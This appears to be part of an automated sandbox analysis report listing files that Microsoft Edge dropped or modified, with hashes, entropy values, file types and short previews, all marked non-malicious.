SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:false
Preview:[]

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):40
Entropy (8bit):4.1275671571169275
Encrypted:false
SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:20D4B8FA017A12A108C87F540836E250
SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:false
Preview:{"SDCH":{"dictionaries":{},"version":2}}

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):2
Entropy (8bit):1.0
Encrypted:false
SSDEEP:3:H:H
MD5:D751713988987E9331980363E24189CE
SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:false
Preview:[]

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):2
Entropy (8bit):1.0
Encrypted:false
SSDEEP:3:H:H
MD5:D751713988987E9331980363E24189CE
SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:false
Preview:[]

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:modified
Size (bytes):1334
                                                                                                                                                                                                                              Entropy (8bit):5.3068589626259115
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:YcCp/WwFGJ/I3w6C1VdsfgZVMdmRds/pJZFRudFGRwC5mWw6maPsQYhbS7nby:YcCpfgCgRsfgts/p/fc7C0khYhbt
                                                                                                                                                                                                                              MD5:49A69CA3DB588A227043FAD82A8EED0F
                                                                                                                                                                                                                              SHA1:EB7B013107043573C381D8E501A44359A235AA6A
                                                                                                                                                                                                                              SHA-256:801C37DA262918F4D4905DD59A3DD0E39F28D1B9415FA98B49C8F74BC9B7098E
                                                                                                                                                                                                                              SHA-512:F30BF2452A9200E4C6D18A5445B48CD217CF45A503CB404DB21E2947DBE7DD747F5593588102CCEC17679B93E8130B728C006C2BA986222425A52D896C5A0542
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL2F6dXJlZWRnZS5uZXQAAAA=",false],"server":"https://edgeassetservice.azureedge.net","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379010818082117","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379010821830801","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczo
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                              Entropy (8bit):0.7429706785845666
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:TLSnAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3isPnSdvd0dn3ldjt9d6XF:TLSOUOq0afDdWec9sJQ3tOXI7J5fc
                                                                                                                                                                                                                              MD5:E837EA6D04D8BF6E6EB3DE44A0D55B3B
                                                                                                                                                                                                                              SHA1:4B9760FAE3A4790477529EA827DFBAF077B626A6
                                                                                                                                                                                                                              SHA-256:9AA122EA750652A4771847ED1329C17F416979053EDA385A99EC10C90AE04EB5
                                                                                                                                                                                                                              SHA-512:1BFDF7E6574A2DA534265F8B6D8641CBC5E841FF445825E7E1634B70D40EC2D62016CBD34A0C739CD2F630A6587EA01B28CA9DA9534C9AD81E9B32CC49019AA5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10346
                                                                                                                                                                                                                              Entropy (8bit):5.1341367806862195
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:stQkmw5sBQcsCRIa34Hko4h8MbV+FItQA4kq7NITbUNKJ:stQKsBQcnRXfbGcQxX7NIb
                                                                                                                                                                                                                              MD5:27EADB3399C6406701850B36879AF39A
                                                                                                                                                                                                                              SHA1:EC044A4215EBABB53C08BC01AF0064E9EE4EDC75
                                                                                                                                                                                                                              SHA-256:8FECB9634AFE1AF8BFC10930192790C24138C0521D8094F8CBB9CE68CCE4EDC1
                                                                                                                                                                                                                              SHA-512:81890FD516DB6DF649004B9F06C382F81BB700F966DE4213FA2C12E47328B67A06053BB473FECE828C7D348FD845A7F456A16D7B769F08BBD3C85880A8190857
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376418816206161","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340968290017037","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"time_of_last_normal_window_close":"13376418824310325","toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":-1436,"left":-2400,"maximized":false,"right":-1350,"top":-2400,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":885,"browser_content_container_width":1006,"browser_content_container_x":0,"browser_content_container_y":79,"continuous_migration":{"ci_correction_for_holdout_tre
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):25029
                                                                                                                                                                                                                              Entropy (8bit):5.566551004421152
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:JGrdUSWPs2fYEi58F1+UoAYDCx9Tuqh0VfUC9xbog/OVU1SJUrwqUWpHtuw:JGrdUSWPs2f1Eu1jaRwJNqUit/
                                                                                                                                                                                                                              MD5:CCB25D9BF3CDF2D108B7FB4A69B25217
                                                                                                                                                                                                                              SHA1:9209729D6D8026A857E130BF8715D2587C95C062
                                                                                                                                                                                                                              SHA-256:7472CB3211F2CDF16624306E74A6C19CCE6697F961893A47E26B75E356C7EEBB
                                                                                                                                                                                                                              SHA-512:DA12E6ECD13B9A47FD3607AFB748760EA0861D72FA9D4658D51F683B128120CA3A59DFBA0D8DB888E73850B7090711FD2819583A36D2E01711A001CE74CD5707
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13376418815238455","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13376418815238455","location":5,"ma
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):337
                                                                                                                                                                                                                              Entropy (8bit):4.035905168618675
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:S85aEFljljljljlj1illaV93lgxFdUA5EEEE:S+a8ljljljljlYlcl+FH
                                                                                                                                                                                                                              MD5:FC5025428F23595526C5BAE35705752D
                                                                                                                                                                                                                              SHA1:1987ACFE5714E0C981729995E7A808C207D5BDC8
                                                                                                                                                                                                                              SHA-256:86813B5065F5B862071B10BEA5065D31102728AB6F356D1A7F88058BEA7FEACF
                                                                                                                                                                                                                              SHA-512:1926354B6DCDDE2309A4E766D7A0948094D3A3D33B2C32AB6633D810BF0DC786BF71BEA9C1577D1DC774B7557E38B1E92EA8480270E212C088FFAED5204D5397
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f...............?},.b................next-map-id.1.Cnamespace-85a6a667_205f_4293_829e_9b616a85deca-https://ntp.msn.com/.0V.e................V.e................V.e................V.e................V.e................
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):324
                                                                                                                                                                                                                              Entropy (8bit):5.248243401541827
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:HUGq2PCHhJ23oH+TcwtrQMxIFUt8YUuRXZmw+YULFkwOCHhJ23oH+TcwtrQMFLJ:LvBYebCFUt8c/+D56YebtJ
                                                                                                                                                                                                                              MD5:D41B01155477023C983C0E666E05F7C8
                                                                                                                                                                                                                              SHA1:4870909D08E6A142C98666C134B154AAE0A68E61
                                                                                                                                                                                                                              SHA-256:1D28A071FF4ECD0CB429E6F09606923D7863640BCD7CE76BCD5D2C63347C0F93
                                                                                                                                                                                                                              SHA-512:D40A531D89A251CDD4844AA334DED5D7DEDC0ABC9CF2C40047223F5C445112D3E417BF840CD3520770587F9234D4BD1F337DFDF52700D81E48218D3268EF4142
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:2024/11/18-10:53:36.367 1994 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/11/18-10:53:36.377 1994 Recovering log #3.2024/11/18-10:53:36.385 1994 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):324
                                                                                                                                                                                                                              Entropy (8bit):5.248243401541827
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:HUGq2PCHhJ23oH+TcwtrQMxIFUt8YUuRXZmw+YULFkwOCHhJ23oH+TcwtrQMFLJ:LvBYebCFUt8c/+D56YebtJ
                                                                                                                                                                                                                              MD5:D41B01155477023C983C0E666E05F7C8
                                                                                                                                                                                                                              SHA1:4870909D08E6A142C98666C134B154AAE0A68E61
                                                                                                                                                                                                                              SHA-256:1D28A071FF4ECD0CB429E6F09606923D7863640BCD7CE76BCD5D2C63347C0F93
                                                                                                                                                                                                                              SHA-512:D40A531D89A251CDD4844AA334DED5D7DEDC0ABC9CF2C40047223F5C445112D3E417BF840CD3520770587F9234D4BD1F337DFDF52700D81E48218D3268EF4142
                                                                                                                                                                                                                              Malicious:false
Preview:2024/11/18-10:53:36.367 1994 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/11/18-10:53:36.377 1994 Recovering log #3.2024/11/18-10:53:36.385 1994 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):1323
Entropy (8bit):3.707843473443351
Encrypted:false
SSDEEP:24:3JnlGxLHpsAF4unxatLp3X2amEtG1ChqYeUJWnQKkOAM4btT37:3J4xbzFMLp2FEkChzeUJWQHOp277
MD5:A49CDB730B5881C3C7C6F7CD27C5113C
SHA1:E47DC498D7EF6D6DAC5B33C9A89BBB28B43B3870
SHA-256:1C5A22C0A3536C8F9D737AF52E26274E6329AAA85EF911A0134ADD5F819EF9DE
SHA-512:6500FE884D5FA5D7A59FDF9D493BD75F17278BAE49E74F43CFAE5526686FE82CEA60601B172AE011C6B85C86CBA312217BAA57D3FBCF59CE7B745D1F68BA5A9A
Malicious:false
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
Category:dropped
Size (bytes):20480
Entropy (8bit):0.44194574462308833
Encrypted:false
SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
MD5:B35F740AA7FFEA282E525838EABFE0A6
SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
Malicious:false
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):352
Entropy (8bit):5.144618866723372
Encrypted:false
SSDEEP:6:HUdkQ+q2PCHhJ23oH+Tcwt7Uh2ghZIFUt8YUdkgZmw+YUdkQVkwOCHhJ23oH+Tcz:rvBYebIhHh2FUt8J/+D56YebIhHLJ
MD5:0F68FBDCFF4DFEDC5A21EFC7FF9895CC
SHA1:05C56F867E66BB6E8E67621EDF244A4F7B5E09C5
SHA-256:DC76C426C057B68FDAC00890B7D567706A68386A810C54CEB25C3ABC6A69B154
SHA-512:CC870E9EE649E05BDF733552A9D9D54B0393AFB4790948C5FB480E3A9247B9BACDB3C87EF49F28E17584093797F1D1B048FC38C4EC73503383277D59CE4AB8A9
Malicious:false
Preview:2024/11/18-10:53:35.218 1df8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/11/18-10:53:35.218 1df8 Recovering log #3.2024/11/18-10:53:35.218 1df8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):270336
Entropy (8bit):0.0012471779557650352
Encrypted:false
SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
MD5:F50F89A0A91564D0B8A211F8921AA7DE
SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
Malicious:false
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):434
Entropy (8bit):5.26002961906001
Encrypted:false
SSDEEP:6:HUmyq2PCHhJ23oH+TcwtzjqEKj3K/2jMGIFUt8YUP1Zmw+YU6RkwOCHhJ23oH+Ts:6vBYebvqBQFUt811/+U56YebvqBvJ
MD5:FD61B38804B4FAE382C393F161719FD4
SHA1:5D0284ED1F1657AA5400E9D372270DAF66DC2C4E
SHA-256:0BAD43AB90D780FF31A83002FC12F290A991A4A2C813DFCD3AEF62ABB4ED3D5D
SHA-512:5D356F652A4290C81E329D630D8696F43E3BAB346D6118F89D6482535FCCBF25F983136858EC1E7AA6E512775C4D2619921C571DFBAEE6A3E410A2A81B73FEEF
Malicious:false
Preview:2024/11/18-10:53:36.394 14c0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/11/18-10:53:36.395 14c0 Recovering log #3.2024/11/18-10:53:36.398 14c0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):40
Entropy (8bit):4.1275671571169275
Encrypted:false
SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:20D4B8FA017A12A108C87F540836E250
SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                              SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:[]
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:[]
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):40
                                                                                                                                                                                                                              Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                              MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                              SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                              SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                              SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):36864
                                                                                                                                                                                                                              Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                              MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                              SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                              SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                              SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):80
                                                                                                                                                                                                                              Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                              MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                              SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                              SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                              SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:*...#................version.1..namespace-..&f.................&f...............
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):422
                                                                                                                                                                                                                              Entropy (8bit):5.286570772537151
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:HUrMxq2PCHhJ23oH+TcwtzjqEKj0QMxIFUt8YUrL9Zmw+YUrRdMkwOCHhJ23oH+f:vvBYebvqBZFUt8b/+a56YebvqBaJ
                                                                                                                                                                                                                              MD5:6384C7F41FAF3DD00C41CDA97294B1A1
                                                                                                                                                                                                                              SHA1:47EB9B7B9D0CD9960A2FBC10341F795B3E1E82D2
                                                                                                                                                                                                                              SHA-256:EE897EDB1FE343AF6291C9BC11F40379BE55F67A2B504F0F8FDFDAFE6DFBC3E1
                                                                                                                                                                                                                              SHA-512:6DA6514864CF57A1594DDCE004DCD2EA6F5EF3A3EC108317FF37EAC22C6570959DC10E4C9D484E7A89B3D893106D8B42A77EDB31C1BD884B44E9900C0EC0DD55
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:2024/11/18-10:53:50.734 1994 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/11/18-10:53:50.736 1994 Recovering log #3.2024/11/18-10:53:50.740 1994 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):422
                                                                                                                                                                                                                              Entropy (8bit):5.286570772537151
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:HUrMxq2PCHhJ23oH+TcwtzjqEKj0QMxIFUt8YUrL9Zmw+YUrRdMkwOCHhJ23oH+f:vvBYebvqBZFUt8b/+a56YebvqBaJ
                                                                                                                                                                                                                              MD5:6384C7F41FAF3DD00C41CDA97294B1A1
                                                                                                                                                                                                                              SHA1:47EB9B7B9D0CD9960A2FBC10341F795B3E1E82D2
                                                                                                                                                                                                                              SHA-256:EE897EDB1FE343AF6291C9BC11F40379BE55F67A2B504F0F8FDFDAFE6DFBC3E1
                                                                                                                                                                                                                              SHA-512:6DA6514864CF57A1594DDCE004DCD2EA6F5EF3A3EC108317FF37EAC22C6570959DC10E4C9D484E7A89B3D893106D8B42A77EDB31C1BD884B44E9900C0EC0DD55
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:2024/11/18-10:53:50.734 1994 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/11/18-10:53:50.736 1994 Recovering log #3.2024/11/18-10:53:50.740 1994 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
Size (bytes):325
Entropy (8bit):5.234659469825199
Encrypted:false
SSDEEP:6:HUVvwVq2PCHhJ23oH+TcwtpIFUt8YUUSgZmw+YUUSIkwOCHhJ23oH+Tcwta/WLJ:9vBYebmFUt8SX/+SF56YebaUJ
MD5:B98C66CF59BF3C7CBA6E29FA72DF5565
SHA1:03411BB904CFF4562B1FC9BB64948609638BAA93
SHA-256:DBD26265859332718D071A047F513DA213F3909F25979D13FAF92F7C369A32CF
SHA-512:3309DE8041C5C9EC38CF730A9CA7784FB81AEF9E0BB5F0814D1156D0C3A772CDD1EA6D48F548F0C399ED9C9962A18538F200545B8B897FCB4FCE3CBF792E3C07
Malicious:false
Preview:2024/11/18-10:53:35.237 f20 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/11/18-10:53:35.238 f20 Recovering log #3.2024/11/18-10:53:35.238 f20 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):325
Entropy (8bit):5.234659469825199
Encrypted:false
